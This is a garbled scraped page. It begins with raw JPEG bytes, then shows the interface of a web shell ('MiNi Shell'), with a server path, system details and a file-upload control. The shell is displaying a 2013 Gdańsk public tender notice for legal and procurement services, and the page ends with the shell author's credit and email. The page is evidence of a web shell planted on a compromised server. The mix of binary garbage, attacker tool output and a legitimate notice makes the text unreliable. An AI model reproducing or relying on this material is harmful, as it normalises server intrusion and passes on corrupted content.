JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/41418-N-2013.html

<p class="kh_header"><b>Gdańsk: świadczenie usług bieżącej obsługi prawnej oraz bieżącej obsługi zamówień publicznych, wynikających z działalności Zamawiającego - Parku Kulturowego Fortyfikacji Miejskich Twierdza Gdańsk</b><br>
<b>Numer ogłoszenia: 41418 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Park Kulturowy Fortyfikacji Miejskich "Twierdza Gdańsk" Jednostka Budżetowa Gminy Miasta Gdańsk , ul. Gradowa 6, 80-802 Gdańsk, woj. pomorskie, tel. 58 300 08 42, faks 58 742 15 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hewelianum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług bieżącej obsługi prawnej oraz bieżącej obsługi zamówień publicznych, wynikających z działalności Zamawiającego - Parku Kulturowego Fortyfikacji Miejskich Twierdza Gdańsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług bieżącej obsługi prawnej oraz bieżącej obsługi zamówień publicznych, wynikających z działalności Zamawiającego.
Przedmiot zamówienia dzieli się na 2 części:
1) cz. 1 - bieżąca obsługa prawna,
2) cz. 2 - bieżąca obsługa zamówień publicznych.
3. Przedmiot zamówienia, w zakresie bieżącej obsługi prawnej, obejmuje:
1)	bieżące udzielanie porad prawnych, dokonywanie interpretacji prawa oraz udzielanie wyjaśnień w zakresie stosowania prawa,
2)	informowanie Zamawiającego o zmianach w przepisach prawnych dotyczących jego działalności,
3)	wydawanie na piśmie opinii prawnych, w terminie do dwóch dni roboczych od daty otrzymania od Zamawiającego zlecenia opinii (dopuszcza się zlecenie jak również dostarczenie opinii drogą mailową); opinia powinna zawierać co najmniej:
a) analizę stanu prawnego,
b) konkluzję zawierającą prawidłowe, zdaniem opiniującego, rozwiązanie. 
W szczególnie uzasadnionych wypadkach termin sporządzenia opinii prawnej lub zaopiniowania aktu prawa miejscowego może ulec skróceniu do jednego dnia na wniosek Zamawiającego.
4)	udział w przygotowaniu, uzgadnianie, opiniowanie, parafowanie dokumentów takich jak: umowy, aneksy, zarządzenia, regulaminy, instrukcje itp.,
5)	występowanie w charakterze pełnomocnika jednostki w postępowaniach sądowych, administracyjnych oraz przed innymi organami orzekającymi,
6)	zapewnienie prowadzenia i reprezentacji we wszystkich sprawach będących w toku postępowań sądowych, administracyjnych lub innych, jak również i tych rozpoczętych przed udzieleniem zamówienia,
7)	przygotowywanie pozwów i pism procesowych,
8)	wykonywanie nadzoru prawnego nad egzekucją należności jednostki oraz współdziałanie w podejmowaniu czynności w zakresie postępowania egzekucyjnego,
9)	doradztwo i przygotowywanie opinii w sprawach związanych z zarządzaniem nieruchomościami jednostki,
10)	pomoc w rozwiązywaniu problemów organizacyjno - kadrowych,
11)	obsługa prawna projektów współfinansowanych ze środków Unii Europejskiej.
12)	obsługa prawna procesów inwestycyjnych, w tym realizowanych według warunków kontraktowych FIDIC.
13)	udzielanie pomocy prawnej pracownikom Zamawiającego w zakresie wykonywanych przez nich zadań,
14)	uczestnictwo, na wniosek Zamawiającego, w przygotowaniu i przeprowadzaniu postępowań o udzielenie zamówienia publicznego,
15)	niezwłoczne informowanie, o zauważonych i stwierdzonych uchybieniach w działalności PKFM Twierdzy Gdańsk,
16)	comiesięczne przygotowywanie raportu z wykonanych czynności,
17)	udział w negocjacjach z podmiotami zewnętrznymi.
4. Wymagania organizacyjne w zakresie bieżącej obsługi prawnej:
1)	wykonawca zapewni fizyczną obecność jednej osoby (radcy prawnego lub adwokata, posiadającego kwalifikacje wskazane w SIWZ), w siedzibie Zamawiającego, w wymiarze 2 godzin tygodniowo, tj. 1 dzień przez 2 godziny, w dniu i godzinach ustalonych przez Zamawiającego (będących dniami pracy Zamawiającego). 
2)	w pozostałe dni robocze Wykonawca zobowiązuje się do udzielania konsultacji w godzinach pracy zamawiającego, za pośrednictwem telefonu, faksu bądź poczty elektronicznej,
3)	w szczególnych przypadkach Wykonawca zobowiązuje się udzielić konsultacji w siedzibie Zamawiającego, w dodatkowym terminie.
4)	wykonawca uprzedzi o nieobecności pracownika, wyznaczy osobę 
na zastępstwo i poinformuje o tym Zamawiającego przed przystąpieniem zastępcy 
do wykonywania umowy, z zastrzeżeniem, że nieobecność pracownika może mieć jedynie charakter doraźny
5. Przedmiot zamówienia, w zakresie bieżącej obsługi zamówień publicznych, obejmuje:
1) przygotowanie i prowadzenie postępowań o udzielenie zamówienia publicznego, w szczególności:
a) wybór trybu postępowania w porozumieniu z Zamawiającym,
b) przygotowanie wniosku o wszczęcie postępowania,
c) sporządzenie projektu dokumentacji niezbędnej do wszczęcia postępowania 
o udzielenie zamówienia publicznego: specyfikacji istotnych warunków zamówienia, ogłoszenia o zamówieniu i zaproszenia do udziału w postępowaniu, wzoru umowy,
d) wykonanie czynności technicznych związanych z wszczęciem postępowania - publikacja ogłoszenia o zamówieniu, przekazanie SIWZ do zamieszczenia na stronie internetowej,
e) udział w pracach komisji przetargowej w zakresie wynikającym z regulaminu komisji przetargowej ,
f) sporządzenie projektów: wyjaśnień treści SIWZ i innych pism  w trakcie postępowania,
g) udział w badaniu  i ocenie ofert,
h) przygotowanie projektu rozstrzygnięcia postępowania - wyboru najkorzystniejszej oferty, wykluczenia wykonawcy z postępowania, odrzucenia oferty, unieważnienia postępowania,
i) prowadzenie procedury odwoławczej, przygotowanie projektu odpowiedzi na odwołanie,
j) przygotowanie i publikację ogłoszeń o udzieleniu zamówienia, informowanie wykonawców o wynikach postępowania,
k) przygotowanie  umowy w sprawie zamówienia publicznego,
l) prowadzenie dokumentacji (protokołu) postępowania,
2) stałą pomoc i doradztwo w bieżących sprawach związanych z zamówieniami publicznymi, m.in.:
a) sporządzanie planu zamówień publicznych na dany rok budżetowy,
b) sporządzenie sprawozdania o udzielonych zamówieniach publicznych,
c) sporządzanie informacji zbiorczych o udzielonych zamówieniach publicznych,
d) opracowywanie, aktualizacja regulaminów udzielania zamówień publicznych,
e) reprezentowanie zamawiającego na rozprawie przed Krajową Izbą Odwoławczą,
3) prowadzenie rejestru oraz monitoring zamówień poniżej 14 000 Euro, zgodnie z obowiązującym regulaminem udzielania zamówień publicznych, o wartości nieprzekraczającej 14 tys. EURO, m.in.:
a) nadawanie kolejnych numerów ewidencyjnych dokumentom wewnętrznym dot. zamówień publicznych,
b) prowadzenie rejestru w formie elektronicznej,
c) monitoring zamówień pod kątem zgodności planu z wykonaniem oraz wydatkowania według rodzajów wydatków,
4) potwierdzanie dokumentów księgowych za zgodność z Ustawą.

6. Wymagania organizacyjne w zakresie obsługi zamówień publicznych
1)	wykonawca zapewni fizyczną obecność jednej osoby (posiadającej kwalifikacje wskazane w SIWZ) w siedzibie Zamawiającego w wymiarze co najmniej 14 godzin tygodniowo, tj. 2 dni po 7 godzin w tygodniu, w dniach i godzinach ustalonych przez Zamawiającego (będących godzinami pracy Zamawiającego). 
2)	W pozostałe dni robocze Wykonawca zobowiązuje się do dyspozycyjności oraz do świadczenia usługi, w godzinach od 7.45 do 15.45, za pośrednictwem telefonu, faksu bądź poczty elektronicznej.
3)	W szczególnych przypadkach Wykonawca zobowiązuje się świadczyć usługę w siedzibie Zamawiającego w dodatkowym terminie.
4)	Wykonawca uprzedzi o nieobecności pracownika i wyznaczy osobę 
na zastępstwo i poinformuje o tym Zamawiającego przed przystąpieniem zastępcy do wykonywania umowy, z zastrzeżeniem, że nieobecność pracownika może mieć jedynie charakter doraźny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, w ciągu 3 lat od udzielenia niniejszego zamówienia, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.10.00-5, 79.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części nr 1 - bieżąca obsługa prawna:
warunek wiedzy i doświadczenia będzie potwierdzony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje należycie co najmniej dwie usługi polegające na bieżącej obsłudze prawnej jednostek sektora finansów publicznych, w tym jednej jednostki samorządu terytorialnego, lub jednostki organizacyjnej samorządu terytorialnego
dla części nr 2 - bieżąca obsługa zamówień publicznych:
warunek wiedzy i doświadczenia będzie potwierdzony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje należycie co najmniej dwie usługi polegające na kompleksowej obsłudze jednostek sektora finansów publicznych w zakresie zamówień publicznych (prowadzenie całokształtu zadań związanych z udzielaniem zamówień publicznych przez zamawiającego), w tym co najmniej jednej jednostki samorządu terytorialnego lub jednostki organizacyjnej samorządu terytorialnego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części nr 1 - bieżąca obsługa prawna: warunek dysponowania osobami zdolnymi do wykonywania zamówienia będzie potwierdzony, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą zdolną do wykonywania zamówienia, spełniającą łącznie poniższe wymagania:
a)	posiadającą tytuł zawodowy radcy prawnego lub adwokata,
b)	posiadającą co najmniej dwuletnie doświadczenie w zawodzie rady prawnego lub adwokata,
c)	posiadającą doświadczenie w wykonywaniu co najmniej dwóch usług obsługi prawnej jednostek sektora finansów publicznych, w tym jednej - jednostki samorządu terytorialnego, lub jednostki organizacyjnej samorządu terytorialnego,
d)	posiadającą doświadczenie w wykonywaniu obsługi prawnej co najmniej jednego  kontraktu współfinansowanego z budżetu Unii Europejskiej,
e)	posiadającą doświadczenie w obsłudze prawnej co najmniej jednego procesu inwestycyjnego, według warunków kontraktowych FIDIC,
dla części nr 2 - bieżąca obsługa zamówień publicznych:
warunek dysponowania osobami zdolnymi do wykonywania zamówienia będzie potwierdzony, jeżeli wykonawca wykaże, że dysponuje co najmniej jednym specjalistą ds. zamówień publicznych spełniającym łącznie poniższe wymagania:
a)	posiadającym wykształcenie wyższe magisterskie,
b)	posiadającym co najmniej 2 - letnie doświadczenie zawodowe na samodzielnym stanowisku w zakresie zamówień publicznych,
c)	posiadającym doświadczenie w obsłudze zamówień publicznych jednostki sektora finansów publicznych, w tym: co najmniej jednej jednostki samorządu terytorialnego lub jednostki organizacyjnej samorządu terytorialnego,
d)	posiadającym doświadczenie w obsłudze co najmniej dwóch kontraktów współfinansowanych z budżetu Unii Europejskiej, w zakresie zamówień publicznych
e)	posiadającym doświadczenie w obsłudze zamówień publicznych przy co najmniej jednym procesie inwestycyjnym realizowanym według warunków kontraktowych FIDIC,
f)	posiadającym doświadczenie w reprezentacji strony przed Krajową Izbą Odwoławczą - co najmniej dwa razy reprezentował stronę postępowania przed Krajową Izbą Odwoławczą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - potencjał kadrowy - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany zawartej umowy będą wymagały pisemnego aneksu, o ile umowa nie stanowi inaczej, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Zmiany umowy mogą dotyczyć:
1)	wynagrodzenia wykonawcy 
2)	warunków płatności,
3)	zmiany personelu wykonawcy
4)	terminów umownych
Zmiany, o których mowa powyżej mogą być dokonane w przypadku:
1) przeszkód technicznych uniemożliwiających zastosowanie przyjętych w SIWZ lub ofercie rozwiązań, 
2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy,
3) przedłużających się procedur przetargowych i administracyjnych, mających wpływ na terminy umowne, opóźnienia zamawiającego w podpisaniu umowy, 
4) ustawowej zmiany stawki podatku od towarów i usług (VAT),
5) wystąpienia innych nieprzewidzianych przeszkód zewnętrznych.
Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.hewelianum.pl/index.php/ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w. lub sekretariat@hewelianum.pl, Park Kulturowy Fortyfikacji Miejskich Twierdza Gdańsk, ul. Gradowa 6, 80-802 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2013 godzina 10:00, miejsce: Park Kulturowy Fortyfikacji Miejskich Twierdza Gdańsk, ul. Gradowa 6, 80-802 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com